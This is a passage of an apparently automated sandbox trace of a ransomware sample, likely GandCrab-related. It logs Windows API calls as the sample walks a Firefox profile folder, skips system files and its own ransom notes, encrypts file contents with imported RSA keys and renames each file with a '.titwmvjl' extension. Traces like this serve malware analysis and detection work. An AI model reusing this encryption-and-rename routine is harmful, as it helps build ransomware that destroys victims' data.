pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0082.351] GetLastError () returned 0x0 [0082.351] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.352] CryptDestroyKey (hKey=0x5032f8) returned 1 [0082.352] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.352] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.352] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.352] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4c9980) returned 1 [0082.355] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.356] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x5035b8) returned 1 [0082.356] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.356] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0082.356] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.356] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0082.357] GetLastError () returned 0x0 [0082.357] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.357] CryptDestroyKey (hKey=0x5035b8) returned 1 [0082.357] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.357] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.357] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0082.357] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0082.358] ReadFile (in: hFile=0x2dc, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e264, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259e264*=0x1df, lpOverlapped=0x0) returned 1 [0082.371] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffffe21, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.371] WriteFile (in: hFile=0x2dc, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x1df, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e248*=0x1df, lpOverlapped=0x0) returned 1 [0082.373] WriteFile (in: hFile=0x2dc, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259e248*=0x21c, lpOverlapped=0x0) returned 1 [0082.375] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.380] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.380] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.381] CloseHandle (hObject=0x2dc) returned 1 [0082.382] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\license.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\license.txt.titwmvjl"), dwFlags=0x1) returned 1 [0082.382] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.383] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0082.383] lstrcmpW (lpString1="manifest.json", lpString2=".") returned 1 [0082.383] lstrcmpW (lpString1="manifest.json", lpString2="..") returned 1 [0082.383] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\", lpString2="manifest.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json" [0082.383] lstrlenW (lpString=".titwmvjl") returned 9 [0082.383] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json") returned 119 [0082.383] VirtualAlloc (lpAddress=0x0, dwSize=0x12e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.383] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json.titwmvjl") returned 128 [0082.383] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json") returned 119 [0082.383] lstrlenW (lpString=".json") returned 5 [0082.383] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.384] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".json ") returned 6 [0082.384] lstrcmpiW (lpString1=".json", lpString2=".titwmvjl") returned -1 [0082.384] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.384] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json") returned 119 [0082.384] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json") returned 119 [0082.384] lstrcmpiW (lpString1="manifest.json", lpString2="desktop.ini") returned 1 [0082.384] lstrcmpiW (lpString1="manifest.json", lpString2="autorun.inf") returned 1 [0082.384] lstrcmpiW (lpString1="manifest.json", lpString2="ntuser.dat") returned -1 [0082.384] lstrcmpiW (lpString1="manifest.json", lpString2="iconcache.db") returned 1 [0082.384] lstrcmpiW (lpString1="manifest.json", lpString2="bootsect.bak") returned 1 [0082.384] lstrcmpiW (lpString1="manifest.json", lpString2="boot.ini") returned 1 [0082.384] lstrcmpiW (lpString1="manifest.json", lpString2="ntuser.dat.log") returned -1 [0082.384] lstrcmpiW (lpString1="manifest.json", lpString2="thumbs.db") returned -1 [0082.384] lstrcmpiW (lpString1="manifest.json", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0082.384] lstrcmpiW (lpString1="manifest.json", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0082.384] lstrcmpiW (lpString1="manifest.json", lpString2="KRAB-DECRYPT.html") returned 1 [0082.384] lstrcmpiW (lpString1="manifest.json", lpString2="CRAB-DECRYPT.html") returned 1 [0082.384] lstrcmpiW (lpString1="manifest.json", lpString2="KRAB-DECRYPT.txt") returned 1 [0082.384] lstrcmpiW (lpString1="manifest.json", lpString2="CRAB-DECRYPT.txt") returned 1 [0082.384] lstrcmpiW (lpString1="manifest.json", lpString2="ntldr") returned -1 [0082.384] lstrcmpiW (lpString1="manifest.json", lpString2="NTDETECT.COM") returned -1 [0082.384] lstrcmpiW (lpString1="manifest.json", lpString2="Bootfont.bin") returned 1 [0082.384] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json") returned 119 [0082.384] lstrlenW (lpString=".json") returned 5 [0082.385] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.385] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".json ") returned 6 [0082.385] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.385] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.385] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2dc [0082.386] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.386] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.386] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4c9980) returned 1 [0082.390] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0082.390] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0082.390] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0082.390] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e220 | out: pbBuffer=0x259e220) returned 1 [0082.390] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.390] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.390] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.391] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.391] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4c9980) returned 1 [0082.394] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0082.395] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0082.395] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0082.395] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e240 | out: pbBuffer=0x259e240) returned 1 [0082.395] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.395] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.395] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.395] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.396] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4c9980) returned 1 [0082.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.400] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x503938) returned 1 [0082.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.400] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0082.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.400] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0082.401] GetLastError () returned 0x0 [0082.401] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.401] CryptDestroyKey (hKey=0x503938) returned 1 [0082.401] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.401] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.401] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.401] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4c9980) returned 1 [0082.405] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.405] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x503738) returned 1 [0082.405] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.405] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0082.405] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.405] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0082.406] GetLastError () returned 0x0 [0082.406] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.406] CryptDestroyKey (hKey=0x503738) returned 1 [0082.406] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.406] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.406] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0082.406] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0082.407] ReadFile (in: hFile=0x2dc, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e264, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259e264*=0x15d, lpOverlapped=0x0) returned 1 [0082.422] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.422] WriteFile (in: hFile=0x2dc, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e248*=0x15d, lpOverlapped=0x0) returned 1 [0082.424] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.424] WriteFile (in: hFile=0x2dc, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259e248*=0x21c, lpOverlapped=0x0) returned 1 [0082.426] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.431] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.432] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.432] CloseHandle (hObject=0x2dc) returned 1 [0082.433] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\manifest.json.titwmvjl"), dwFlags=0x1) returned 1 [0082.434] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.434] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0082.434] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0082.434] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0082.434] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\TITWMVJL-DECRYPT.txt" [0082.434] lstrlenW (lpString=".titwmvjl") returned 9 [0082.434] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\TITWMVJL-DECRYPT.txt") returned 126 [0082.434] VirtualAlloc (lpAddress=0x0, dwSize=0x13c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.434] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 135 [0082.435] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\TITWMVJL-DECRYPT.txt") returned 126 [0082.435] lstrlenW (lpString=".txt") returned 4 [0082.435] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.435] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".txt ") returned 5 [0082.435] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0082.435] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.435] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\TITWMVJL-DECRYPT.txt") returned 126 [0082.435] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\TITWMVJL-DECRYPT.txt") returned 126 [0082.435] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0082.435] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0082.435] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0082.435] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0082.435] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0082.435] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0082.435] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0082.435] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0082.435] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.436] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0082.436] lstrcmpW (lpString1="widevinecdm.dll", lpString2=".") returned 1 [0082.436] lstrcmpW (lpString1="widevinecdm.dll", lpString2="..") returned 1 [0082.436] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\", lpString2="widevinecdm.dll" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll" [0082.436] lstrlenW (lpString=".titwmvjl") returned 9 [0082.436] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll") returned 121 [0082.436] VirtualAlloc (lpAddress=0x0, dwSize=0x132, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.436] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.titwmvjl") returned 130 [0082.436] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll") returned 121 [0082.436] lstrlenW (lpString=".dll") returned 4 [0082.436] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.436] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".dll ") returned 5 [0082.437] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.437] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.437] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0082.437] lstrcmpW (lpString1="widevinecdm.dll.lib", lpString2=".") returned 1 [0082.437] lstrcmpW (lpString1="widevinecdm.dll.lib", lpString2="..") returned 1 [0082.437] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\", lpString2="widevinecdm.dll.lib" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib" [0082.437] lstrlenW (lpString=".titwmvjl") returned 9 [0082.437] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib") returned 125 [0082.437] VirtualAlloc (lpAddress=0x0, dwSize=0x13a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.437] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib.titwmvjl") returned 134 [0082.438] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib") returned 125 [0082.438] lstrlenW (lpString=".lib") returned 4 [0082.438] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.438] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".lib ") returned 5 [0082.438] lstrcmpiW (lpString1=".lib", lpString2=".titwmvjl") returned -1 [0082.438] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.438] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib") returned 125 [0082.438] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib") returned 125 [0082.438] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="desktop.ini") returned 1 [0082.438] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="autorun.inf") returned 1 [0082.438] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="ntuser.dat") returned 1 [0082.438] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="iconcache.db") returned 1 [0082.438] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="bootsect.bak") returned 1 [0082.438] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="boot.ini") returned 1 [0082.438] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="ntuser.dat.log") returned 1 [0082.438] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="thumbs.db") returned 1 [0082.438] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0082.438] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0082.438] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="KRAB-DECRYPT.html") returned 1 [0082.439] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="CRAB-DECRYPT.html") returned 1 [0082.439] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="KRAB-DECRYPT.txt") returned 1 [0082.439] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="CRAB-DECRYPT.txt") returned 1 [0082.439] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="ntldr") returned 1 [0082.439] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="NTDETECT.COM") returned 1 [0082.439] lstrcmpiW (lpString1="widevinecdm.dll.lib", lpString2="Bootfont.bin") returned 1 [0082.439] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib") returned 125 [0082.439] lstrlenW (lpString=".lib") returned 4 [0082.439] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, 